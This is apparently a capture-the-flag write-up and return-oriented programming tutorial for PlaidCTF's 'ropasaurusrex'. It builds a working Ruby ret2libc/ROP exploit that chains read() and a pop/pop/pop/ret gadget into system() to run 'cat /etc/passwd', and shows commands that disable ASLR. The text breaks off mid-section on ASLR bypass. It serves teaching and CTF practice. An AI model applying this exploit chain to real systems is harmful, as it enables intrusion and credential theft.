One of the worst feelings when playing a capture-the-flag challenge is the hindsight problem. You spend a few hours on a level—nothing like the amount of time I spent on cnot, not by a fraction—and realize that it was actually pretty easy. But also a brainfuck. That’s what ROP’s all about, after all!
Anyway, even though I spent a lot of time working on the wrong solution (specifically, I didn’t think to bypass ASLR for quite a while), the route we took, completing the level first without ASLR and then with it, is actually a good way to explain it, so I’ll take the same route in this post.
Before I say anything else, I have to thank HikingPete for being my wingman on this one. Thanks to him, we solved this puzzle much more quickly and, for a short time, were in 3rd place worldwide! Coincidentally, I’ve been meaning to write a post on ROP for some time now. I even wrote a vulnerable demo program that I was going to base this on! But, since PlaidCTF gave us this challenge, I thought I’d talk about it instead! This isn’t just a writeup, this is designed to be a fairly in-depth primer on return-oriented programming! If you’re more interested in the process of solving a CTF level, have a look at my writeup of cnot. :)
What the heck is ROP?
ROP (return-oriented programming) is a modern generalization of a classic exploit technique called “return into libc”. The idea is that you’ve found an overflow or other type of vulnerability in a program that lets you take control, but you have no reliable way to get your own code into executable memory (DEP, or data execution prevention, means that you can’t run code from anywhere you want anymore).
With ROP, you pick and choose pieces of code that are already in executable sections of memory and are followed by a ‘return’. Sometimes those pieces are simple, and sometimes they’re complicated. In this exercise, we only need the simple stuff, thankfully!
But, we’re getting ahead of ourselves. Let’s first learn a little more about the stack! I’m not going to spend a ton of time explaining the stack, so if this is unclear, please check out my assembly tutorial.
The stack
I’m sure you’ve heard of the stack before. Stack overflows? Smashing the stack? But what’s it actually mean? If you already know, feel free to treat this as a quick primer, or to just skip right to the next section. Up to you!
The simple idea is, let’s say function A() calls function B() with two parameters, 1 and 2. Then B() calls C() with two parameters, 3 and 4. When you’re in C(), the stack looks like this:
    +----------------------+
    |         ...          | (higher addresses)
    +----------------------+

    +----------------------+ <-- start of 'A's stack frame
    |   [return address]   | <-- address of whatever called 'A'
    +----------------------+
    |   [frame pointer]    |
    +----------------------+
    |  [local variables]   |
    +----------------------+

    +----------------------+ <-- start of 'B's stack frame
    |         2 (parameter)|
    +----------------------+
    |         1 (parameter)|
    +----------------------+
    |   [return address]   | <-- the address that 'B' returns to
    +----------------------+
    |   [frame pointer]    |
    +----------------------+
    |  [local variables]   |
    +----------------------+

    +----------------------+ <-- start of 'C's stack frame
    |         4 (parameter)|
    +----------------------+
    |         3 (parameter)|
    +----------------------+
    |   [return address]   | <-- the address that 'C' returns to
    +----------------------+

    +----------------------+
    |         ...          | (lower addresses)
    +----------------------+
This is quite a mouthful (eyeful?) if you don’t live and breathe all the time at this depth, so let me explain a bit. Every time you call a function, a new “stack frame” is built. A “frame” is simply some memory that the function allocates for itself on the stack. In fact, it doesn’t even allocate it, it just adds stuff to the end and updates the esp register so any functions it calls know where its own stack frame needs to start (esp, the stack pointer, is basically a variable).
This stack frame holds the context for the current function, and lets you easily a) build frames for new functions being called, and b) return to previous frames (i.e., return from functions). esp (the stack pointer) moves up and down, but always points to the top of the stack (the lowest address).
Have you ever wondered where a function’s local variables go when you call another function (or, better yet, you call the same function again recursively)? Of course not! But if you did, now you’d know: they wind up in an old stack frame that we return to later!
Now, let’s look at what’s stored on the stack, in the order it gets pushed (note that, confusingly, you can draw a stack either way; in this document, the stack grows from top to bottom, so the older/callers are on top and the newer/callees are on the bottom):
- Parameters: The parameters that were passed into the function by the caller—these are extremely important with ROP.
- Return address: Every function needs to know where to go when it's done. When you call a function, the address of the instruction right after the call is pushed onto the stack prior to entering the new function. When you return, the address is popped off the stack and is jumped to. This is extremely important with ROP.
- Saved frame pointer: Let's totally ignore this. Seriously. It's just something that compilers typically do, except when they don't, and we won't speak of it again.
- Local variables: A function can allocate as much memory as it needs (within reason) to store local variables. They go here. They don't matter at all for ROP and can be safely ignored.
So, to summarize: when a function is called, parameters are pushed onto the stack, followed by the return address. When the function returns, it grabs the return address off the stack and jumps to it. The parameters pushed onto the stack are removed by the calling function, except when they’re not. We’re going to assume the caller cleans up (that is, the function doesn’t clean up after itself), since that’s how it works in this challenge (and most of the time on Linux).
Heaven, hell, and stack frames
The main thing you have to understand to know ROP is this: a function’s entire universe is its stack frame. The stack is its god, the parameters are its commandments, local variables are its sins, the saved frame pointer is its bible, and the return address is its heaven (okay, probably hell). It’s all right there in the Book of Intel, chapter 3, verses 19 - 26 (note: it isn’t actually, don’t bother looking).
Let’s say you call the sleep() function, and get to the first line; its stack frame is going to look like this:
    ...                      <-- don't know, don't care territory (higher addresses)
    +----------------------+
    |      [seconds]       |
    +----------------------+
    |   [return address]   | <-- esp points here
    +----------------------+
    ...                      <-- not allocated, don't care territory (lower addresses)

When sleep() starts, this stack frame is all it sees. It can save a frame pointer (crap, I mentioned it twice since I promised not to; I swear I won’t mention it again) and make room for local variables by subtracting the number of bytes it wants from esp (i.e., making esp point to a lower address). It can call other functions, which create new frames under esp. It can do many different things; what matters is that, when sleep() starts, the stack frame makes up its entire world.
When sleep() returns, it winds up looking like this:
    ...                      <-- don't know, don't care territory (higher addresses)
    +----------------------+
    |      [seconds]       | <-- esp points here
    +----------------------+
    | [old return address] | <-- not allocated, don't care territory starts here now
    +----------------------+
    ...                      (lower addresses)
And, of course, the caller, after sleep() returns, will remove “seconds” from the stack by adding 4 to esp (later on, we’ll talk about how we have to use pop/pop/ret constructs to do the same thing).
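If the push/pop bookkeeping feels abstract, here’s a minimal sketch of it in Ruby. It’s a toy model, not how a real CPU works: the ToyStack class, the starting esp, and the return address are all made up for illustration.

```ruby
# Toy model of a 32-bit stack: a hash of address => value plus an esp register.
# ToyStack and every address below are hypothetical, for illustration only.
class ToyStack
  attr_reader :esp

  def initialize(esp)
    @esp = esp
    @mem = {}
  end

  def push(value)
    @esp -= 4            # the stack grows toward lower addresses
    @mem[@esp] = value
  end

  def pop
    value = @mem[@esp]
    @esp += 4
    value
  end
end

stack = ToyStack.new(0xbffff000)   # arbitrary starting esp
start = stack.esp

stack.push(10)           # caller pushes the "seconds" argument
stack.push(0x08048400)   # "call" pushes the return address (made-up value)
eip = stack.pop          # "ret" pops it back off and jumps to it
after_ret = stack.esp    # esp now points at "seconds"
stack.pop                # caller cleans up (same effect as add esp, 4)

puts format("returned to 0x%08x", eip)
puts stack.esp == start
```

The last line prints true: once the caller has cleaned up its argument, esp is back where it started, which is exactly the job a pop/pop/ret does for us later.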
In a properly working system, this is how life works. That’s a safe assumption. The “seconds” value would only be on the stack if it was pushed, and the return address is going to point to the place it was called from. Duh. How else would it get there?
Controlling the stack
…well, since you asked, let me tell you. We’ve all heard of a “stack overflow”, which involves overwriting a variable on the stack. What’s that mean? Well, let’s say we have a frame that looks like this:
    ...                      <-- don't know, don't care territory (higher addresses)
    +----------------------+
    |      [seconds]       |
    +----------------------+
    |   [return address]   | <-- esp points here
    +----------------------+
    |     char buf[16]     |
    |                      |
    |                      |
    |                      |
    +----------------------+
    ...                      (lower addresses)

The variable buf is 16 bytes long. What happens if a program tries to write to the 17th byte of buf (i.e., buf[16])? Well, it writes to the first byte in memory of the return address, which on little-endian x86 is its least significant byte. The 18th byte overwrites the next byte up, and so on. Therefore, we can change the return address to point anywhere we want. Anywhere we want. So when the function returns, where’s it go? Well, it thinks it’s going to where it’s supposed to go (in a perfect world, it would be), but nope! In this case, it’s going to wherever the attacker wants it to. If the attacker says to jump to 0, it jumps to 0 and crashes. If the attacker says to go to 0x41414141 (“AAAA”), it jumps there and probably crashes. If the attacker says to jump to the stack… well, that’s where it gets more complicated…
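To make the byte-by-byte overwrite concrete, here’s a rough Ruby model of that frame: 16 bytes of buf followed directly by a 4-byte return address. The helper names (overflow, return_address) are mine, and the original return address is just a placeholder value.

```ruby
# Toy model of the frame above: buf[16] sits directly below the return address.
BUF_SIZE = 16
frame = ("\x00" * BUF_SIZE + [0x080483f4].pack("V")).b  # placeholder return address

# Copy attacker input over the start of the frame, with no bounds check.
def overflow(frame, input)
  out = frame.dup
  out[0, input.bytesize] = input.b
  out
end

# Read the 4 bytes after buf as a little-endian 32-bit value.
def return_address(frame)
  frame[BUF_SIZE, 4].unpack1("V")
end

one_byte = overflow(frame, "A" * 17)           # only buf[16] spills over
smashed  = overflow(frame, "A" * 16 + "BBBB")  # all four bytes replaced

puts format("0x%08x", return_address(frame))     # 0x080483f4
puts format("0x%08x", return_address(one_byte))  # 0x08048341
puts format("0x%08x", return_address(smashed))   # 0x42424242
```

Notice that the single-byte spill only changes the low byte (f4 becomes 41), which is the little-endian behaviour described above.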
DEP
Traditionally, an attacker would change the return address to point to the stack, since the attacker already has the ability to put code on the stack (after all, code is just a bunch of bytes!). But, being that it was such a common and easy way to exploit systems, those assholes at OS companies (just kidding, I love you guys :) ) put a stop to it by introducing data execution prevention, or DEP. On any DEP-enabled system, you can no longer run code on the stack—or, more generally, anywhere an attacker can write—instead, it crashes.
So how the hell do I run code without being allowed to run code!?
Well, we’re going to get to that. But first, let’s look at the vulnerability that the challenge uses!
The vulnerability
Here’s the vulnerable function, fresh from IDA:
    .text:080483F4 vulnerable_function proc near
    .text:080483F4
    .text:080483F4 buf             = byte ptr -88h
    .text:080483F4
    .text:080483F4                 push    ebp
    .text:080483F5                 mov     ebp, esp
    .text:080483F7                 sub     esp, 98h
    .text:080483FD                 mov     dword ptr [esp+8], 100h ; nbytes
    .text:08048405                 lea     eax, [ebp+buf]
    .text:0804840B                 mov     [esp+4], eax    ; buf
    .text:0804840F                 mov     dword ptr [esp], 0 ; fd
    .text:08048416                 call    _read
    .text:0804841B                 leave
    .text:0804841C                 retn
    .text:0804841C vulnerable_function endp
Now, if you don’t know assembly, this might look daunting. But, in fact, it’s simple. Here’s the equivalent C:
    ssize_t __cdecl vulnerable_function()
    {
      char buf[136];
      return read(0, buf, 256);
    }
So, it reads 256 bytes into a 136-byte buffer. Goodbye Mr. Stack!
You can easily validate that by running it, piping in a bunch of ‘A’s, and seeing what happens:
    ron@debian-x86 ~ $ ulimit -c unlimited
    ron@debian-x86 ~ $ perl -e "print 'A'x300" | ./ropasaurusrex
    Segmentation fault (core dumped)
    ron@debian-x86 ~ $ gdb ./ropasaurusrex core
    [...]
    Program terminated with signal 11, Segmentation fault.
    #0  0x41414141 in ?? ()
    (gdb)
Simply speaking, it means that we overwrote the return address with the letter A 4 times (0x41414141 = “AAAA”).
Now, there are good ways and bad ways to figure out exactly what you control. I used a bad way. I put “BBBB” at the end of my buffer and simply removed ‘A’s until it crashed at 0x42424242 (“BBBB”):
    ron@debian-x86 ~ $ perl -e "print 'A'x140;print 'BBBB'" | ./ropasaurusrex
    Segmentation fault (core dumped)
    ron@debian-x86 ~ $ gdb ./ropasaurusrex core
    #0  0x42424242 in ?? ()
If you want to do this “better” (by which I mean, slower), check out Metasploit’s pattern_create.rb and pattern_offset.rb. They’re great when guessing is a slow process, but for the purpose of this challenge it was so quick to guess and check that I didn’t bother.
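For the curious, the idea behind those pattern tools can be sketched in a few lines of Ruby. This is my own simplified stand-in, not Metasploit’s code: it builds the familiar “Aa0Aa1Aa2…” sequence, in which every 4-byte window is unique, and then looks up where the crashing address sits inside it.

```ruby
# Simplified stand-in for the pattern_create / pattern_offset idea.
# Hypothetical helpers, not Metasploit's implementation.
def pattern_create(length)
  out = +""
  ("A".."Z").each do |upper|
    ("a".."z").each do |lower|
      ("0".."9").each do |digit|
        out << upper << lower << digit
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# Given the address the program crashed at, find which 4 bytes of the
# pattern ended up in the return address (little-endian on x86).
def pattern_offset(crash_eip, length)
  needle = [crash_eip].pack("V")
  pattern_create(length).index(needle)
end

pattern = pattern_create(300)
puts pattern[0, 12]                      # Aa0Aa1Aa2Aa3

# If we had sent this pattern, the four bytes at offset 140 would land in
# the return address, and gdb would report them as the crash address:
crash = pattern[140, 4].unpack1("V")
puts format("crash at 0x%08x -> offset %d", crash, pattern_offset(crash, 300))
```

One run with the pattern replaces the whole guess-and-check loop: the crash address alone tells you the offset (140 here).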
Starting to write an exploit
The first thing you should do is start running ropasaurusrex as a network service. The folks who wrote the CTF used xinetd to do this, but we’re going to use netcat, which is just as good (for our purposes):
    $ while true; do nc -vv -l -p 4444 -e ./ropasaurusrex; done
    listening on [any] 4444 ...
From now on, we can use localhost:4444 as the target for our exploit and test if it’ll work against the actual server.
You may also want to disable ASLR if you’re following along:
    $ sudo sysctl -w kernel.randomize_va_space=0
Note that this will make your system easier to exploit, so I don’t recommend doing this outside of a lab environment!
Here’s some ruby code for the initial exploit:
    $ cat ./sploit.rb
    require 'socket'

    s = TCPSocket.new("localhost", 4444)

    # Generate the payload
    payload = "A"*140 +
      [
        0x42424242,
      ].pack("I*") # Convert a series of 'ints' to a string

    s.write(payload)
    s.close()
Run that with ruby ./sploit.rb and you should see the service crash:
    connect to [127.0.0.1] from debian-x86.skullseclabs.org [127.0.0.1] 53451
    Segmentation fault (core dumped)
And you can verify, using gdb, that it crashed at the right location:
    $ gdb --quiet ./ropasaurusrex core
    [...]
    Program terminated with signal 11, Segmentation fault.
    #0  0x42424242 in ?? ()
We now have the beginning of an exploit!
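A quick aside on what that pack call is doing, since every later payload depends on it. The sketch below uses "V" (always 32-bit little-endian) where the exploit uses "I" (native int size and byte order); on 32-bit x86 the two produce the same bytes, so treat "V" as my substitution for portability, not as what the exploit requires.

```ruby
# 140 bytes of padding = 136 bytes of buf + 4 bytes of saved frame pointer
# (buf lives at ebp-0x88 in the IDA listing), then the new return address.
ret = 0x42424242
payload = "A" * 140 + [ret].pack("V")
puts payload.bytesize                                # 144

# A real address shows the byte order more clearly than "BBBB" does:
bytes = [0x0804832c].pack("V").bytes
puts bytes.map { |b| format("%02x", b) }.join(" ")   # 2c 83 04 08
```

The low byte goes first in memory, which is why the address looks backwards in a hex dump of the payload.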
How to waste time with ASLR
I called this section ‘wasting time’, because I didn’t realize—at the time—that ASLR was enabled. However, assuming no ASLR actually makes this a much more instructive puzzle. So for now, let’s not worry about ASLR—in fact, let’s not even define ASLR. That’ll come up in the next section.
Okay, so what do we want to do? We have a vulnerable process, and we have the libc shared library. What’s the next step?
Well, our ultimate goal is to run system commands. Because stdin and stdout are both hooked up to the socket, if we could run, for example, system(“cat /etc/passwd”), we’d be set! Once we do that, we can run any command. But doing that involves two things:
- Getting the string cat /etc/passwd into memory somewhere
- Running the system() function
Getting the string into memory
Getting the string into memory actually involves two sub-steps:
- Find some memory that we can write to
- Find a function that can write to it
Tall order? Not really! First things first, let’s find some memory that we can read and write! The most obvious place is the .data section:
    ron@debian-x86 ~ $ objdump -x ropasaurusrex | grep -A1 '\.data'
     23 .data         00000008  08049620  08049620  00000620  2**2
                      CONTENTS, ALLOC, LOAD, DATA
Uh oh, .data is only 8 bytes long. That’s not enough! In theory, any address that’s long enough, writable, and not used will be enough for what we need. Looking at the output for objdump -x, I see a section called .dynamic that seems to fit the bill:
     20 .dynamic      000000d0  08049530  08049530  00000530  2**2
                      CONTENTS, ALLOC, LOAD, DATA
The .dynamic section holds information for dynamic linking. We don’t need that for what we’re going to do, so let’s choose address 0x08049530 to overwrite.
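The “is it big enough?” check is easy to automate. Here’s a small Ruby sketch that parses the two section lines quoted above and keeps the ones that can hold our command. It only looks at size; it doesn’t check the flags line, so writability is something you still confirm by eye. The Section struct and helper names are mine.

```ruby
# Section lines copied from the objdump -x output quoted in this post.
OBJDUMP_LINES = <<~EOS
  23 .data         00000008  08049620  08049620  00000620  2**2
  20 .dynamic      000000d0  08049530  08049530  00000530  2**2
EOS

Section = Struct.new(:name, :size, :vma)

# Columns are: index, name, size, VMA, LMA, file offset, alignment.
def parse_sections(text)
  text.each_line.map do |line|
    _idx, name, size, vma = line.split
    Section.new(name, size.to_i(16), vma.to_i(16))
  end
end

def big_enough(sections, needed)
  sections.select { |s| s.size >= needed }
end

needed = "cat /etc/passwd\0".bytesize   # 16 bytes including the terminator
candidates = big_enough(parse_sections(OBJDUMP_LINES), needed)
candidates.each do |s|
  puts format("%s at 0x%08x (%d bytes)", s.name, s.vma, s.size)
end
```

With these two lines as input, only .dynamic survives: .data’s 8 bytes can’t hold a 16-byte string.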
The next step is to find a function that can write our command string to address 0x08049530. The most convenient functions to use are the ones that are in the executable itself, rather than a library, since the functions in the executable won’t change from system to system. Let’s look at what we have:
    ron@debian-x86 ~ $ objdump -R ropasaurusrex

    ropasaurusrex:     file format elf32-i386

    DYNAMIC RELOCATION RECORDS
    OFFSET   TYPE              VALUE
    08049600 R_386_GLOB_DAT    __gmon_start__
    08049610 R_386_JUMP_SLOT   __gmon_start__
    08049614 R_386_JUMP_SLOT   write
    08049618 R_386_JUMP_SLOT   __libc_start_main
    0804961c R_386_JUMP_SLOT   read
So, we have read() and write() immediately available. That’s helpful! The read() function will read data from the socket and write it to memory. The prototype looks like this:
    ssize_t read(int fd, void *buf, size_t count);
This means that, when you enter the read() function, you want the stack to look like this:
    +----------------------+
    |         ...          | - doesn't matter, other funcs will go here
    +----------------------+

    +----------------------+ <-- start of read()'s stack frame
    |     size_t count     | - count, strlen("cat /etc/passwd")
    +----------------------+
    |      void *buf       | - writable memory, 0x08049530
    +----------------------+
    |        int fd        | - should be 'stdin' (0)
    +----------------------+
    |   [return address]   | - where 'read' will return
    +----------------------+

    +----------------------+
    |         ...          | - doesn't matter, read() will use for locals
    +----------------------+
We update our exploit to look like this (explanations are in the comments):
    $ cat sploit.rb
    require 'socket'

    s = TCPSocket.new("localhost", 4444)

    # The command we'll run
    cmd = ARGV[0] + "\0"

    # From objdump -x
    buf = 0x08049530

    # From objdump -D ./ropasaurusrex | grep read
    read_addr = 0x0804832C
    # From objdump -D ./ropasaurusrex | grep write
    write_addr = 0x0804830C

    # Generate the payload
    payload = "A"*140 +
      [
        cmd.length, # number of bytes
        buf,        # writable memory
        0,          # stdin
        0x43434343, # read's return address

        read_addr   # Overwrite the original return
      ].reverse.pack("I*") # Convert a series of 'ints' to a string

    # Write the 'exploit' payload
    s.write(payload)

    # When our payload calls read() the first time, this is read
    s.write(cmd)

    # Clean up
    s.close()
We run that against the target:
    ron@debian-x86 ~ $ ruby sploit.rb "cat /etc/passwd"
And verify that it crashes:
    listening on [any] 4444 ...
    connect to [127.0.0.1] from debian-x86.skullseclabs.org [127.0.0.1] 53456
    Segmentation fault (core dumped)
Then verify that it crashed at the return address of read() (0x43434343) and wrote the command to the memory at 0x08049530:
    $ gdb --quiet ./ropasaurusrex core
    [...]
    Program terminated with signal 11, Segmentation fault.
    #0  0x43434343 in ?? ()
    (gdb) x/s 0x08049530
    0x8049530:       "cat /etc/passwd"
Perfect!
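The exploit writes the frame top-down (to match the diagrams) and then reverses it, because memory runs the other way. If that trick is confusing, here’s an equivalent way to think about it: a hypothetical rop_call helper that lays out one call in memory order. It’s just a sketch of the same bytes, not something the exploit needs.

```ruby
# Lay out one cdecl call as it must appear in memory, lowest address first:
# the function to jump to, the return address it will see, then its arguments.
# rop_call is a made-up helper name for illustration.
def rop_call(func_addr, ret_addr, *args)
  [func_addr, ret_addr, *args].pack("V*")
end

cmd = "cat /etc/passwd\0"
buf = 0x08049530
read_addr = 0x0804832c

frame = rop_call(read_addr, 0x43434343, 0, buf, cmd.length)
payload = "A" * 140 + frame

# Same bytes as the reversed list used in the exploit above:
reversed = [cmd.length, buf, 0, 0x43434343, read_addr].reverse.pack("V*")
puts frame == reversed
puts payload.bytesize
```

Both spellings produce the identical 20 bytes, so pick whichever one matches the picture in your head.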
Running it
Now that we’ve written cat /etc/passwd into memory, we need to call system() and point it at that address. It turns out, if we assume ASLR is off, this is easy. We know that the executable is linked with libc:
    $ ldd ./ropasaurusrex
            linux-gate.so.1 =>  (0xb7703000)
            libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb75aa000)
            /lib/ld-linux.so.2 (0xb7704000)
And libc.so.6 contains the system() function:
    $ objdump -T /lib/i686/cmov/libc.so.6 | grep system
    000f5470 g    DF .text  00000042  GLIBC_2.0   svcerr_systemerr
    00039450 g    DF .text  0000007d  GLIBC_PRIVATE __libc_system
    00039450  w   DF .text  0000007d  GLIBC_2.0   system
We can figure out the address where system() ends up loaded in ropasaurusrex in our debugger:
    $ gdb --quiet ./ropasaurusrex core
    [...]
    Program terminated with signal 11, Segmentation fault.
    #0  0x43434343 in ?? ()
    (gdb) x/x system
    0xb7ec2450 <system>:    0x890cec83

Because system() only takes one argument, building the stack frame is pretty easy:

    +----------------------+
    |         ...          | - doesn't matter, other funcs will go here
    +----------------------+

    +----------------------+ <-- Start of system()'s stack frame
    |      void *arg       | - our buffer, 0x08049530
    +----------------------+
    |   [return address]   | - where 'system' will return
    +----------------------+
    |         ...          | - doesn't matter, system() will use for locals
    +----------------------+
Now if we stack this on top of our read() frame, things are looking pretty good:
    +----------------------+
    |         ...          |
    +----------------------+

    +----------------------+ <-- Start of system()'s stack frame
    |      void *arg       |
    +----------------------+
    |   [return address]   |
    +----------------------+

    +----------------------+ <-- Start of read()'s frame
    |     size_t count     |
    +----------------------+
    |      void *buf       |
    +----------------------+
    |        int fd        |
    +----------------------+
    | [address of system]  | <-- Stack pointer
    +----------------------+

    +----------------------+
    |         ...          |
    +----------------------+

The diagram above shows the stack at the moment read() is about to return, with the stack pointer on its return address. When read() returns, it pops that return address off the stack and jumps to it. This is what the stack looks like right after read() returns:

    +----------------------+
    |         ...          |
    +----------------------+

    +----------------------+ <-- Start of system()'s frame
    |      void *arg       |
    +----------------------+
    |   [return address]   |
    +----------------------+

    +----------------------+ <-- Start of read()'s frame
    |     size_t count     |
    +----------------------+
    |      void *buf       |
    +----------------------+
    |        int fd        | <-- Stack pointer
    +----------------------+
    | [address of system]  |
    +----------------------+

    +----------------------+
    |         ...          |
    +----------------------+
Uh oh, that’s no good! The stack pointer is pointing to the middle of read()’s frame when we enter system(), not to the bottom of system()’s frame like we want it to! What do we do?
Well, when we perform a ROP exploit, there’s a very important construct we need called pop/pop/ret. In this case, it’s actually pop/pop/pop/ret, which we’ll call “pppr” for short. Just remember, it’s enough “pops” to clear the stack, followed by a return.
pop/pop/pop/ret is a construct that we use to remove the stuff we don’t want off the stack. Since read() has three arguments, we need to pop all three of them off the stack, then return. To demonstrate, here’s what the stack looks like immediately after read() returns to a pop/pop/pop/ret:
    +----------------------+
    |         ...          |
    +----------------------+

    +----------------------+ <-- Start of system()'s frame
    |      void *arg       |
    +----------------------+
    |   [return address]   |
    +----------------------+

    +----------------------+ <-- Special frame for pop/pop/pop/ret
    | [address of system]  |
    +----------------------+

    +----------------------+ <-- Start of read()'s frame
    |     size_t count     |
    +----------------------+
    |      void *buf       |
    +----------------------+
    |        int fd        | <-- Stack pointer
    +----------------------+
    | [address of "pppr"]  |
    +----------------------+

    +----------------------+
    |         ...          |
    +----------------------+
After “pop/pop/pop/ret” runs, but before it returns, we get this:
    +----------------------+
    |         ...          |
    +----------------------+

    +----------------------+ <-- Start of system()'s frame
    |      void *arg       |
    +----------------------+
    |   [return address]   |
    +----------------------+

    +----------------------+ <-- pop/pop/pop/ret's frame
    | [address of system]  | <-- stack pointer
    +----------------------+

    +----------------------+
    |     size_t count     | <-- read()'s frame
    +----------------------+
    |      void *buf       |
    +----------------------+
    |        int fd        |
    +----------------------+
    | [address of "pppr"]  |
    +----------------------+

    +----------------------+
    |         ...          |
    +----------------------+
Then when it returns, we’re exactly where we want to be:
    +----------------------+
    |         ...          |
    +----------------------+

    +----------------------+ <-- Start of system()'s frame
    |      void *arg       |
    +----------------------+
    |   [return address]   | <-- stack pointer
    +----------------------+

    +----------------------+ <-- pop/pop/pop/ret's frame
    | [address of system]  |
    +----------------------+

    +----------------------+ <-- Start of read()'s frame
    |     size_t count     |
    +----------------------+
    |      void *buf       |
    +----------------------+
    |        int fd        |
    +----------------------+
    | [address of "pppr"]  |
    +----------------------+

    +----------------------+
    |         ...          |
    +----------------------+
Finding a pop/pop/pop/ret is pretty easy using objdump:
    $ objdump -d ./ropasaurusrex | egrep 'pop|ret'
    [...]
     80484b5:       5b                      pop    ebx
     80484b6:       5e                      pop    esi
     80484b7:       5f                      pop    edi
     80484b8:       5d                      pop    ebp
     80484b9:       c3                      ret
This lets us remove between 1 and 4 arguments off the stack before executing the next function. Perfect!
And remember, if you’re doing this yourself, ensure that the pops are at consecutive addresses. Using egrep to find them can be a little dangerous like that.
So now, if we want a triple pop and a ret (to remove the three arguments that read() used), we want the address 0x80484b6, so we set up our stack like this:
    +----------------------+
    |         ...          |
    +----------------------+

    +----------------------+ <-- Start of system()'s frame
    |      void *arg       | - 0x08049530 (buf)
    +----------------------+
    |   [return address]   | - 0x44444444
    +----------------------+

    +----------------------+
    | [address of system]  | - 0xb7ec2450
    +----------------------+

    +----------------------+ <-- Start of read()'s frame
    |     size_t count     | - strlen(cmd)
    +----------------------+
    |      void *buf       | - 0x08049530 (buf)
    +----------------------+
    |        int fd        | - 0 (stdin)
    +----------------------+
    | [address of "pppr"]  | - 0x080484b6
    +----------------------+

    +----------------------+
    |         ...          |
    +----------------------+
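If you’d like to convince yourself that this layout really walks from read() to system(), here’s a toy emulator in Ruby. It’s a sketch under heavy assumptions: the stack is just an array of 32-bit words in memory order, each “function” only records the arguments it would see and then returns, and run_chain is a name I made up.

```ruby
READ   = 0x0804832c
PPPR   = 0x080484b6
SYSTEM = 0xb7ec2450
BUF    = 0x08049530

# The words that follow the 140 bytes of padding, lowest address first.
chain = [READ, PPPR, 0, BUF, 16, SYSTEM, 0x44444444, BUF]

# Walk the chain the way the CPU would: each ret pops the next word into eip.
def run_chain(chain)
  trace = []
  esp = 0
  eip = chain[esp]; esp += 1          # vulnerable_function's ret
  loop do
    case eip
    when READ
      # On entry, [esp] is the return address and the arguments follow it.
      trace << [:read, chain[esp + 1, 3]]
      eip = chain[esp]; esp += 1      # ret
    when PPPR
      esp += 3                        # pop; pop; pop
      eip = chain[esp]; esp += 1      # ret
    when SYSTEM
      trace << [:system, chain[esp + 1, 1]]
      eip = chain[esp]; esp += 1      # ret
    else
      trace << [:crash, eip]          # nothing mapped here in our toy world
      return trace
    end
  end
end

trace = run_chain(chain)
trace.each { |step| p step }
```

The trace shows read(0, buf, 16), then system(buf), then a crash at 0x44444444 (printed in decimal by p), which is the order of events we’re after.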
We also update our exploit with an s.read() at the end, to read whatever data the remote server sends us. The current exploit now looks like:

    require 'socket'

    s = TCPSocket.new("localhost", 4444)

    # The command we'll run
    cmd = ARGV[0] + "\0"

    # From objdump -x
    buf = 0x08049530

    # From objdump -D ./ropasaurusrex | grep read
    read_addr = 0x0804832C
    # From objdump -D ./ropasaurusrex | grep write
    write_addr = 0x0804830C
    # From gdb, "x/x system"
    system_addr = 0xb7ec2450
    # From objdump, "pop/pop/pop/ret"
    pppr_addr = 0x080484b6

    # Generate the payload
    payload = "A"*140 +
      [
        # system()'s stack frame
        buf,         # writable memory (cmd buf)
        0x44444444,  # system()'s return address

        # pop/pop/pop/ret's stack frame
        system_addr, # pop/pop/pop/ret's return address

        # read()'s stack frame
        cmd.length,  # number of bytes
        buf,         # writable memory (cmd buf)
        0,           # stdin
        pppr_addr,   # read()'s return address

        read_addr    # Overwrite the original return
      ].reverse.pack("I*") # Convert a series of 'ints' to a string

    # Write the 'exploit' payload
    s.write(payload)

    # When our payload calls read() the first time, this is read
    s.write(cmd)

    # Read the response from the command and print it to the screen
    puts(s.read)

    # Clean up
    s.close()
And when we run it, we get the expected result:
    $ ruby sploit.rb "cat /etc/passwd"
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    ...
And if you look at the core dump, you’ll see it’s crashing at 0x44444444 as expected.
Done, right?
WRONG!
This exploit worked perfectly against my test machine, but when ASLR is enabled, it failed:
    $ sudo sysctl -w kernel.randomize_va_space=1
    kernel.randomize_va_space = 1
    ron@debian-x86 ~ $ ruby sploit.rb "cat /etc/passwd"
This is where it starts to get a little more complicated. Let’s go!
What is ASLR?
ASLR (address space layout randomization) is a defense implemented on all modern systems (FreeBSD was the exception when this was written) that randomizes the addresses that libraries are loaded at. As an example, let’s run ropasaurusrex twice and get the address of system():

    ron@debian-x86 ~ $ perl -e 'printf "A"x1000' | ./ropasaurusrex
    Segmentation fault (core dumped)
    ron@debian-x86 ~ $ gdb ./ropasaurusrex core
    Program terminated with signal 11, Segmentation fault.
    #0  0x41414141 in ?? ()
    (gdb) x/x system
    0xb766e450 <system>:    0x890cec83

    ron@debian-x86 ~ $ perl -e 'printf "A"x1000' | ./ropasaurusrex
    Segmentation fault (core dumped)
    ron@debian-x86 ~ $ gdb ./ropasaurusrex core
    Program terminated with signal 11, Segmentation fault.
    #0  0x41414141 in ?? ()
    (gdb) x/x system
    0xb76a7450 <system>:    0x890cec83
Notice that the address of system() changes from 0xb766e450 to 0xb76a7450. That’s a problem!
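It’s worth looking at how the address changes, because that’s what makes ASLR beatable. A small Ruby sketch, assuming the two gdb sessions above used the same libc that objdump -T reported earlier (where system() sits at offset 0x39450):

```ruby
SYSTEM_OFFSET = 0x39450   # system()'s offset inside libc, from objdump -T

# system() as gdb reported it in the two runs above.
runs = [0xb766e450, 0xb76a7450]

# Subtracting the fixed offset gives where libc itself was loaded each time.
bases = runs.map { |addr| addr - SYSTEM_OFFSET }
bases.each { |base| puts format("libc base: 0x%08x", base) }

# The low 12 bits never change, because libraries are loaded page-aligned.
low_bits = runs.map { |addr| addr & 0xfff }
puts low_bits.map { |bits| format("0x%03x", bits) }.join(", ")
```

Only the base moves (0xb7635000 versus 0xb766e000 here); the distance from the base to system(), and between any two functions in the same libc, stays fixed. Leak one address and the rest follow.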
Defeating ASLR
So, what do we know? Well, the binary itself isn’t ASLRed, which means that we can rely on every address in it to stay put, which is useful. Most importantly, the relocation table will remain at the same address:
    $ objdump -R ./ropasaurusrex

    ./ropasaurusrex:     file format elf32-i386

    DYNAMIC RELOCATION RECORDS
    OFFSET   TYPE              VALUE
